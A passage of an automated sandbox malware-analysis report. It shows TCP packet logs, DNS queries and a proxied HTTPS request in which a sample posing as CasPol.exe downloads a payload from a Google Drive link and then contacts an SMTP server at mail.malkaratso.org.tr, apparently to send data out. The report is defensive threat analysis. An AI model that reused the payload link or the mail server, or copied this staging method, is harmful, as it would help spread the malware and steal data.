                                              Dec 3, 2021 08:24:05.360168934 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.360344887 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.360387087 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.360533953 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.360569000 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.360722065 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.360759020 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.360965014 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.360991001 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.361013889 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.361146927 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.361186028 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.361562014 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.361715078 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.361749887 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362025976 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.362078905 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362298965 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.362551928 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362708092 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.362721920 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362742901 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362890005 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.362977982 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.363009930 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.363049984 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.363074064 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.363142014 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.363585949 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.363621950 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.363934040 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.364059925 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.364237070 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.364273071 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.364315033 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.364430904 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.364470005 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.364495993 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.364682913 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.364947081 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.365094900 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.365138054 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.365232944 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.365323067 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.365360975 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.365398884 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.365529060 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.365900993 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.366091013 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.366307020 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.366466999 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.366472960 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.366514921 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.366651058 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.366856098 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367016077 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.367024899 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367054939 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367186069 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.367206097 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.367222071 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367396116 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.367662907 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367818117 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.367854118 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.367943048 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.368038893 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368063927 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.368105888 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368216038 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368398905 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.368566036 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.368608952 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368643999 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.368714094 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368793964 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.368809938 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.369009972 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370172977 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370331049 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370341063 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370362043 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370522022 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370589972 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370600939 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370630026 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370680094 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370740891 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370759964 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370794058 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370935917 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.370942116 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.370980978 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371083975 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371104956 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.371144056 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371155977 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.371181011 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371263027 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.371325016 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.371613026 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371776104 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.371783972 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371815920 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371968031 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.371972084 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372000933 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372098923 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372121096 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372143984 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372308969 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372416973 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372587919 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372590065 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372627974 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372736931 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372742891 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.372798920 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.372970104 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.373012066 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373235941 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.373274088 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373426914 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.373475075 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373634100 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.373647928 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373668909 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373852015 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.373899937 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.373936892 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374001026 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374038935 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374090910 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374129057 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374263048 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374299049 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374310017 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374322891 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374341011 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374434948 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374459982 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374476910 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374492884 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374640942 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374655008 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374686956 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374793053 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374814987 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374921083 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.374924898 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374958992 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.374972105 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375060081 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375082016 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375104904 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375303030 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375447989 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375618935 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375633955 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375655890 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375781059 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375807047 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.375832081 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375916004 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.375982046 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376017094 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376070976 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376137018 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376226902 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376244068 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376281023 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376291990 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376378059 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376467943 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376574993 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376729965 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376765966 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376843929 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.376935005 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.376971006 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377017021 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377105951 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377141953 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377151966 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377171993 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377290010 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377321005 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377356052 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377454996 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377594948 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.377614021 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.377758026 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.378401041 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378599882 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378628969 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.378669977 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378752947 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378755093 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.378837109 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378835917 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.378870964 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.378962040 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379020929 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379050970 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379184008 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379199982 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379208088 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379241943 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379384041 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379420996 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379535913 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379584074 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379646063 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379683971 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.379719019 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379816055 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.379987955 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380023956 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.380131960 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.380172014 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380193949 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.380306005 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380342007 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:24:05.380358934 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380464077 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380511999 CET49808443192.168.11.20216.58.212.129
                                              Dec 3, 2021 08:24:05.380553961 CET44349808216.58.212.129192.168.11.20
                                              Dec 3, 2021 08:25:40.753202915 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.774215937 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.774390936 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.912132025 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.912561893 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.934145927 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.934530020 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.957628012 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.960306883 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.986651897 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.986740112 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.986804008 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.986848116 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.986933947 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.986987114 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:40.987961054 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:40.990155935 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.012214899 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.060394049 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.167397976 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.189085007 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.190696955 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.212527990 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.213047981 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.242861032 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.243423939 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.265152931 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.265583038 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.322328091 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.322662115 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.344299078 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.381092072 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.381288052 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.381302118 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.381305933 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:25:41.402653933 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.402678967 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.402836084 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.402851105 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.404593945 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:25:41.450972080 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:27:20.616790056 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:27:20.639695883 CET58749824212.83.130.20192.168.11.20
                                              Dec 3, 2021 08:27:20.639914036 CET49824587192.168.11.20212.83.130.20
                                              Dec 3, 2021 08:27:20.640405893 CET49824587192.168.11.20212.83.130.20

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Dec 3, 2021 08:24:04.035654068 CET5903553192.168.11.201.1.1.1
                                              Dec 3, 2021 08:24:04.045047045 CET53590351.1.1.1192.168.11.20
                                              Dec 3, 2021 08:24:04.907629013 CET5123953192.168.11.201.1.1.1
                                              Dec 3, 2021 08:24:04.953001976 CET53512391.1.1.1192.168.11.20
                                              Dec 3, 2021 08:25:40.592478037 CET5502253192.168.11.201.1.1.1
                                              Dec 3, 2021 08:25:40.694175959 CET53550221.1.1.1192.168.11.20

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Dec 3, 2021 08:24:04.035654068 CET192.168.11.201.1.1.10x5b65Standard query (0)drive.google.comA (IP address)IN (0x0001)
                                              Dec 3, 2021 08:24:04.907629013 CET192.168.11.201.1.1.10xd39fStandard query (0)doc-04-7o-docs.googleusercontent.comA (IP address)IN (0x0001)
                                              Dec 3, 2021 08:25:40.592478037 CET192.168.11.201.1.1.10xd92aStandard query (0)mail.malkaratso.org.trA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Dec 3, 2021 08:24:04.045047045 CET1.1.1.1192.168.11.200x5b65No error (0)drive.google.com142.250.181.238A (IP address)IN (0x0001)
                                              Dec 3, 2021 08:24:04.953001976 CET1.1.1.1192.168.11.200xd39fNo error (0)doc-04-7o-docs.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)
                                              Dec 3, 2021 08:24:04.953001976 CET1.1.1.1192.168.11.200xd39fNo error (0)googlehosted.l.googleusercontent.com216.58.212.129A (IP address)IN (0x0001)
                                              Dec 3, 2021 08:25:40.694175959 CET1.1.1.1192.168.11.200xd92aNo error (0)mail.malkaratso.org.trmalkaratso.org.trCNAME (Canonical name)IN (0x0001)
                                              Dec 3, 2021 08:25:40.694175959 CET1.1.1.1192.168.11.200xd92aNo error (0)malkaratso.org.tr212.83.130.20A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • drive.google.com
                                              • doc-04-7o-docs.googleusercontent.com

                                              HTTPS Proxied Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.11.2049807142.250.181.238443C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                              TimestampkBytes transferredDirectionData
                                              2021-12-03 07:24:04 UTC0OUTGET /uc?export=download&id=1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8 HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2021-12-03 07:24:04 UTC0INHTTP/1.1 302 Moved Temporarily
                                              Content-Type: text/html; charset=UTF-8
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 03 Dec 2021 07:24:04 GMT
                                              Location: https://doc-04-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu03i2is66lao2nkn5tgms2vaqhaoo/1638516225000/01591657853412424088/*/1wmG82hGvqKzvgNq4QIGmYB0d7zlHfgB8?e=download
                                              P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                              Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                                              Content-Security-Policy: script-src 'nonce-FrWvm2hEAARaFzyNOJ25Gw' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                                              Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                                              X-Content-Type-Options: nosniff
                                              X-Frame-Options: SAMEORIGIN
                                              X-XSS-Protection: 1; mode=block
                                              Server: GSE
                                              Set-Cookie: NID=511=EhL_McMuw-bD1Q0d_6CqT2bSAuROdb1DQJ0agl7JUh3eKhfbafTzoCy6VQdosR78vJ0-vJzrte6qopn_UNhjk5ckkf3qUC_AMS8RF7eLzfZwpNSCISLALU56wEJ92VwCGX7kQUr4qWkD75LJxDatf4X74cTAraarygL-AhCegsw; expires=Sat, 04-Jun-2022 07:24:04 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                                              Accept-Ranges: none
                                              Vary: Accept-Encoding
                                              Connection: close
                                              Transfer-Encoding: chunked
                                              2021-12-03 07:24:04 UTC1INData Raw: 31 38 34 0d 0a 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 46 46 46 46 46 46 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 3e 0a 3c 48 31 3e 4d 6f 76 65 64 20 54 65 6d 70 6f 72 61 72 69 6c 79 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 2d 30 34 2d 37 6f 2d 64 6f 63 73 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 64 6f 63 73 2f 73 65 63 75 72 65 73 63 2f 68 61 30 72 6f 39 33 37 67 63 75 63 37 6c 37 64 65 66 66 6b 73 75 6c 68 67 35 68 37 6d 62 70 31 2f 6c 67 6c 75
                                              Data Ascii: 184<HTML><HEAD><TITLE>Moved Temporarily</TITLE></HEAD><BODY BGCOLOR="#FFFFFF" TEXT="#000000"><H1>Moved Temporarily</H1>The document has moved <A HREF="https://doc-04-7o-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/lglu
                                              2021-12-03 07:24:04 UTC2INData Raw: 30 0d 0a 0d 0a
                                              Data Ascii: 0


